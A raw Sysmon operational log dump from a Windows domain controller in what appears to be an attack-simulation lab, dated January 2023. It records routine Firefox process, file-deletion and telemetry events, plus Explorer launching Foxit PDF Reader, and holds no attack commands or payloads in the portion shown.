Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.489{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.489{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.488{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.488{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.488{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+121c68|C:\Program Files\Mozilla Firefox\xul.dll+164f8d3|UNKNOWN(00000295DAA44B31) 154100x800000000000000039576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.487{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/1052e587-2eb3-4423-ae75-ebf8abca3a74/new-profile/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\1052e587-2eb3-4423-ae75-ebf8abca3a74 https://incoming.telemetry.mozilla.org/submit/telemetry/6f9e4b5a-cf53-4959-9c07-f023402ce9d4/event/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\6f9e4b5a-cf53-4959-9c07-f023402ce9d4 https://incoming.telemetry.mozilla.org/submit/telemetry/427643f4-4c37-40cb-b3ae-60b8792f9915/first-shutdown/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\427643f4-4c37-40cb-b3ae-60b8792f9915C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 23542300x800000000000000039575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.484{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\aborted-session-pingMD5=56B91462F2DB1F0F3D753EDC179A8C11,SHA256=2283E17F2D8E031B2AE7ABB3900AF608BEEE8AABC17461A3B00370E3433BDEAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.398{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage.sqlite-journalMD5=071DA4A1729E7358276A3DD62A6D25B1,SHA256=A7C28E83F54C3AAC734158A45673484ECE0D72CBB2DF784B2588EBFEAAB0CEC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.390{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walMD5=E06099DCEC9B3E656C52155D4F3C66F7,SHA256=4C17982EEAE0900151AFFEE836BA940E111F3F183466B8929427C8A488A1BF2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.389{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=D05CC57C001183075518A5E84D8C9459,SHA256=0BEC7DCACA9D36AE4A6ED7F7E7C0E7AE106B671AD392B870C25EE56627AC33F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.386{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.382{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-walMD5=A23787F00DB7FC0C15A54D8B68E69813,SHA256=9F1FCB43D403CAC53DF7AFB090771B95B5591E9E9E1441F774A4B172215D0462,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.377{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=A76E2589039D24D9DC7FD862251DF429,SHA256=2ACA5EA4BD71CF8F3AA136F38510F547D51B2D27DC1F03ECE1C7B811FD565B7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.370{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\favicons.sqlite-walMD5=7F4B8CCCC5A28912620B8B7B99E2ED46,SHA256=731FDFE4DFB4F1C1D02545C8F0A736AD9E903469F5FDE805171B8702B195B203,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.352{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\favicons.sqlite-shmMD5=412F4E3C029A26346BF5027944CA1587,SHA256=A9087D7CB798FF00D8FC6E2672B7961D67B8876FDEEE5FD1A3635AE17DEA2F59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.345{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\places.sqlite-walMD5=E6A2990F646213CBD61A5E27D355BAE4,SHA256=A221C803DD6EBDCBEC50B46B8158F2FCC6200D633213350532E692ADFED87AD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.322{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\places.sqlite-shmMD5=5D0FAE2D151B96F9939D868185F2A75C,SHA256=F908D8E6791B2DC7614379E6E35B7B90DBF72158FA46DF17B96BFE0F54684C11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.292{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.291{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E2AB-63C7-D205-00000000AF02}3104C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(00000295DAA9A18D) 23542300x800000000000000039562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.291{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.291{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E2AA-63C7-D105-00000000AF02}1484C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(00000295DAA43E90) 10341000x800000000000000039560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.291{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E292-63C7-C905-00000000AF02}1888C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(00000295DAA43E90) 10341000x800000000000000039559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.289{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E1F4-63C7-9D05-00000000AF02}7156C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(00000295DAA43E90) 23542300x800000000000000039558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.286{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.277{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\protections.sqlite-journalMD5=F3B2EAAA57083687AEB76A9707BD9287,SHA256=24C809E046728BF50604CB550F963C2434B387ECCDAA9A8ED2CDD539263C9406,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.217{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\sessionstore-backups\recovery.jsonlz4MD5=692E62AD3DCDE6ED553BD7CF7CDB762F,SHA256=E4D82CE85AC552151851353F62D2B6818F7DEA89452B2ECAA00B801CE0BCA78F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.217{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\sessionstore-backups\recovery.baklz4MD5=F4E8580C1E1A856E30384B5A8005CC6E,SHA256=6376F91E3C602B980CB7A2FED721C5A892A31588B98EC6F3084FA6022C13DD08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.203{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E27B-63C7-C605-00000000AF02}6772C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e8e1a7|C:\Program Files\Mozilla Firefox\xul.dll+831d2a|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.171{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1416AF39515F603B585851FFF452CBF5,SHA256=395AA423C8EA47B5B015E9BD4607412C550B83218077BDC73F4D0951F13444DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.171{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E269-63C7-BF05-00000000AF02}6172C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e8e1a7|C:\Program Files\Mozilla Firefox\xul.dll+831d2a|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(00000295DAB639FC) 23542300x800000000000000039551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.171{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=8DC12A38B7D5302A1E05EA9FD1267650,SHA256=37CFA0589B01ECE0E52E9B96ACFB8F2DF7D72F0163AB1215C8C05F90BC5C23E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.156{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B8F7EEA2FAF2A7876F2043F5A6A01009,SHA256=A7EDBE0D71C4E679316B117427856CFDDD23D39C73292FF4EB4234506736CE26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.156{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\events\newtabMD5=69433D4F64EBC4408D3CB52A96D9287B,SHA256=30ABBF26C4C08E9933BA0A62F9F15D0314754D68578D28599D62D61E27DB6081,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.156{FE4C2B44-E1F1-63C7-9405-00000000AF02}352ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B8F7EEA2FAF2A7876F2043F5A6A01009,SHA256=A7EDBE0D71C4E679316B117427856CFDDD23D39C73292FF4EB4234506736CE26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 